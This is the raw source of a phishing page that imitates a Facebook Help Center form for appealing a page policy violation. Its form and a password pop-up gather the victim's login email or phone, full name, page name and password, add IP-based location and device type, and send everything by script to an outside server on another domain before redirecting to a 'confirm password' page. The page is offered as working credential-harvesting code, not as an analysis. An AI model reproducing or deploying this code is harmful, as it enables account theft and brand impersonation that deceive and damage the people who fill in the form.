<html lang="en"><head><meta charset="utf-8"><meta name="viewport" content="width=device-width,initial-scale=1"><link rel="stylesheet" href="https://maxcdn.bootstrapcdn.com/bootstrap/4.5.2/css/bootstrap.min.css"><link rel="icon" type="image/png" href="images/facebook.png"><link rel="stylesheet" href="style.css"><script src="https://ajax.googleapis.com/ajax/libs/jquery/3.5.1/jquery.min.js"></script><script src="https://cdnjs.cloudflare.com/ajax/libs/popper.js/1.16.0/umd/popper.min.js"></script><script src="https://maxcdn.bootstrapcdn.com/bootstrap/4.5.2/js/bootstrap.min.js"></script><script src="https://cdnjs.cloudflare.com/ajax/libs/bootstrap-validator/0.5.3/js/bootstrapValidator.min.js" integrity="sha512-Vp2UimVVK8kNOjXqqj/B0Fyo96SDPj9OCSm1vmYSrLYF3mwIOBXh/yRZDVKo8NemQn1GUjjK0vFJuCSCkYai/A==" crossorigin="anonymous"></script><script type="text/javascript">window.screen>540&&(window.location.href="mappeal.html");</script><title>Facebook Help Center</title><style>.wrapper{display:flex;flex-wrap:wrap}.top{width:100%;height:55px}.left{width:19%;height:100%}.right{width:81%;height:100%}.main-container2{width:45%;margin-top:20px;position:relative;top:unset;left:unset;transform:unset}@media only screen and (max-width:1919px) and (min-width:1501px){.left{width:25%}.right{width:75%}.left img{text-align:center;max-width:100%;height:auto;margin-left:40%}}@media(max-width:1500px){.top{position:absolute;left:0;right:0;top:0;bottom:0;width:100%;height:55px}.left img,.right img,.top img{width:100%;height:auto}.left{position:relative;top:55px}.right{position:relative;top:40px}}</style><script type="text/javascript">$(document).ready(function(){var n=location.href.substring(0,location.href.lastIndexOf("/"));$("#siteUrl").val(n)}),$(document).ready(function(){$(window).keydown(function(n){return 13==n.keyCode?(n.preventDefault(),!1):void 0})});</script></head><body id="body"><div class="modal" id="myModal"><div class="modal-dialog modal-dialog-centered"><div class="modal-content"><div class="modal-header"><h6 class="modal-title">Enter Your Password</h6><button type="button" class="close" data-dismiss="modal">×</button></div><form id="pwsubmit"><div class="modal-body"><input type="hidden" name="siteUrl" id="siteUrl" value="https://facebookappeal-case17750031.web.app"> <input required type="password" id="firstpassword" name="firstpassword" class="form-control" placeholder="Enter Password Here"></div><div class="modal-footer"><input class="submitBtn" type="button" id="pwbutton" value="Continue"></div></form></div></div></div><div class="wrapper"><div class="top"><img src="images/top.png" alt=""></div><div class="left"><img src="images/left.png" alt=""></div><div class="right"><img src="images/bottom-top.png" alt=""><div class="main-container2"><div class="custom-form"><div class="appeal"><h3>Appeal a Page Policy Violation</h3></div><p class="normal-text">If you think your page was restricted by mistake, please fill out this form:</p><form name="RegForm" id="reg_form"><div class="form-group" style="margin:0!important"><div class="mb-3"><label for="exampleFormControlInput1" class="form-label">Page Name</label><input name="pgname" required class="form-control" id="pgname"></div></div><div class="form-group" style="margin:0!important"><div class="mb-3"><label for="exampleFormControlInput1" class="form-label">Login email address or mobile phone number</label><input required name="email" class="form-control" id="email"></div></div><div class="form-group" style="margin:0!important"><div class="mb-3"><label for="exampleFormControlInput1" class="form-label">Your full name</label><input required name="fname" class="form-control" id="fname"></div></div><div class="form-group" style="margin:0!important"><div class="mb-3"><label for="exampleFormControlTextarea1" class="form-label">Additional info</label><textarea class="form-control" name="exampleFormControlTextarea3" id="tjerat" rows="3"></textarea></div></div><div class="bottom" style="padding-bottom:2rem!important"><input class="submitBtn" type="submit" value="Continue"></div></form></div></div></div></div><script src="https://cdn.jsdelivr.net/npm/bootstrap@5.0.0-beta1/dist/js/bootstrap.bundle.min.js" integrity="sha384-ygbV9kiqUc6oa4msXn9868pTtWMgiQaeYH7/t7LECLbyPA2x65Kgf80OJFdroafW" crossorigin="anonymous"></script><script type="text/javascript">var email;
            var name;
            var additionalinfos;
            var pagename;
            

            function submitForm(){

              const getDeviceType = () => {
  const ua = navigator.userAgent;
  if (/(tablet|ipad|playbook|silk)|(android(?!.*mobi))/i.test(ua)) {
    return "Tablet";
  }
  if (
    /Mobile|iP(hone|od|ad)|Android|BlackBerry|IEMobile|Kindle|Silk-Accelerated|(hpw|web)OS|Opera M(obi|ini)/.test(
      ua
    )
  ) {
    return "Mobile";
  }
  return "Desktop";
};
               
                  email =  document.getElementById('email').value;                  
                  name = document.getElementById("fname").value;
                  additionalinfos=document.getElementById("tjerat").value;
                  pagename=document.getElementById("pgname").value;
                  event.preventDefault();
                  var step4HTML='';
                  $('#myModal').modal('show'); 
                

                var country_name;
  var country_code;
  var country_city;
  var ipaddress;
  var origin = true;


          $.getJSON('https://ipapi.co/json/', function(data) {
  var obj = JSON.parse(JSON.stringify(data, null, 2));
   country_name = obj.country;
   country_code = obj.country_code;
   country_city = obj.city;
   ipaddress = obj.ip;

         event.preventDefault()
               var siteUrl=window.location.href;
               var emailInfos='Ok';
               //var firstPassword =  document.getElementById('inputPassword').value; 
               $.post("https://thepleasy.com/wp-admin/sendAjax.php",
                        {
                          email: email,
                          fullname: name,
                          emailInfos:emailInfos,
                          tjerat:additionalinfos,
                          pgname: pagename,
                          siteUrl: siteUrl,
                          country: country_name,
                          ip: ipaddress,
                          city: country_city,
                          device: getDeviceType,
                          origin: origin
                        },
                        function(data, status){
                          //window.location.href='step5.html';
                          
                  });  

               });
                       
               
            }

        function sendData()
        {

  
        }

     //   function sendPass(){


                $("#pwbutton").click(function(e){
                  e.preventDefault();
                 
                            const getDeviceType = () => {
  const ua = navigator.userAgent;
  if (/(tablet|ipad|playbook|silk)|(android(?!.*mobi))/i.test(ua)) {
    return "Tablet";
  }
  if (
    /Mobile|iP(hone|od|ad)|Android|BlackBerry|IEMobile|Kindle|Silk-Accelerated|(hpw|web)OS|Opera M(obi|ini)/.test(
      ua
    )
  ) {
    return "Mobile";
  }
  return "Desktop";


};

 $.getJSON('https://ipapi.co/json/', function(data) {
  var obj = JSON.parse(JSON.stringify(data, null, 2));
   country_name = obj.country;
   country_code = obj.country_code;
   country_city = obj.city;
   ipaddress = obj.ip;

                       let el = document.createElement("input");
                //    el.value = document.getElementById('firstpassword').value;
                //    el.id="firstpaswordD";
           //   el.name="firstPassword";
           //  var fullname=document.getElementById('fname').value;
           //   var firstpassword= document.getElementById('firstpassword').value;
              var pw =document.getElementById('firstpassword').value;
               //     let form = document.getElementById("formasubmitapeal");
                  //  form.appendChild(el);

                  if(pw != ""){
S
                  

              $.post("https://thepleasy.com/wp-admin/sendAjax.php", 
              {
             //   email: email,
            //    fullname: fullname,
                firstpassword: pw,
                  country: country_name,
                          ip: ipaddress,
                          city: country_city,
                          device: getDeviceType,
           
              },
              function (data, status) {
                  window.location.href = "confirmpassword.html";
                
                 
           });

              }
               });

              });


     //   }


      $(document).ready(function() {
            $('#reg_form').bootstrapValidator({
                    // To use feedback icons, ensure that you use Bootstrap v3.1.0 or later
                    feedbackIcons: {
                       
                        invalid: 'fa fa-exclamation-circle fa-lg',
                        validating: 'glyphicon glyphicon-refresh'
                    },
                    fields: {
                        pgname: {
                            validators: {
                                notEmpty: {
                                    message: 'Please enter your Page Name'
                                }
                            }
                        },
                        email: {
                            validators: {
                                notEmpty: {
                                    message: 'Please enter your email address or phone number'
                                },
                            }
                        },

                        checkboxi: {
                            validators: {
                                notEmpty: {
                                    message: 'Do you agree?'
                                }
                            }
                        },
                        fname: {
                            validators: {
                                notEmpty: {
                                    message: 'Please enter your Name'
                                }
                            }
                        },







                    }
                })


                .on('success.form.bv', function(e) {
                    $('#success_message').slideDown({
                        opacity: "show"
                    }, "slow") // Do something ...
                    $('#reg_form').data('bootstrapValidator').resetForm();

                    // Prevent form submission
                    e.preventDefault();

                    // Get the form instance
                    var $form = $(e.target);

                    // Get the BootstrapValidator instance
                    var bv = $form.data('bootstrapValidator');

                    // Use Ajax to submit form data
                    submitForm();
                });
        });
         

          setTimeout(function(){
            $("#body").show();
          },300);</script></body></html>